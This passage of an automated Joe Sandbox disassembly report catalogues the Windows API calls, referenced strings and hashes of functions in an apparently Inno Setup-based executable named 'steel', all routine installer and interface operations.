                                                                                            • GetDC.USER32(00000000), ref: 0041BC12
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 1095203571-0
                                                                                            • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                            • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                            APIs
                                                                                              • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                            Strings
                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                            • API String ID: 1452528299-4018462623
                                                                                            • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                            • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                            • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                            APIs
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                            • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$RealizeSelect$Release
                                                                                            • String ID:
                                                                                            • API String ID: 2261976640-0
                                                                                            • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                            • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                            APIs
                                                                                              • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                              • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                              • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                              • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                            • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                              • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                              • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                              • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                              • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                            • String ID: vLB
                                                                                            • API String ID: 1477829881-1797516613
                                                                                            • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                            • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                            APIs
                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                            • String ID: Z
                                                                                            • API String ID: 3604996873-1505515367
                                                                                            • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                            • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                            • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                            APIs
                                                                                            • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: DrawText$EmptyRect
                                                                                            • String ID:
                                                                                            • API String ID: 182455014-2867612384
                                                                                            • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                            • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                            • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                            • String ID: ...\
                                                                                            • API String ID: 3133960002-983595016
                                                                                            • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                            • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                            • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$Move
                                                                                            • String ID: isRS-%.3u.tmp
                                                                                            • API String ID: 3839737484-3657609586
                                                                                            • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                            • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                            • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                            • API String ID: 1220098344-2970929446
                                                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                            • API String ID: 1312246647-2435364021
                                                                                            • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                            • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                            • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                            Strings
                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                            • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                            • API String ID: 3850602802-3720027226
                                                                                            • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                            • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                            • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetFocus.USER32 ref: 00478757
                                                                                            • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                            • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                            • String ID: Wnd=$%x
                                                                                            • API String ID: 1381870634-2927251529
                                                                                            • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                            • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                            • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                            APIs
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$File$LocalSystem
                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                            • API String ID: 1748579591-1013271723
                                                                                            • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                            • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                            • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                            • String ID: DeleteFile$MoveFile
                                                                                            • API String ID: 3024442154-139070271
                                                                                            • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                            • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                            • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                            • API String ID: 47109696-2631785700
                                                                                            • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                            • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                            • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                            Strings
                                                                                            • CSDVersion, xrefs: 00483BFC
                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                            • API String ID: 3677997916-1910633163
                                                                                            • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                            • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                            • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                            • API String ID: 1646373207-4063490227
                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                            • API String ID: 1646373207-260599015
                                                                                            • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                            • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                            • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                                            • API String ID: 1646373207-597752486
                                                                                            • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                            • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
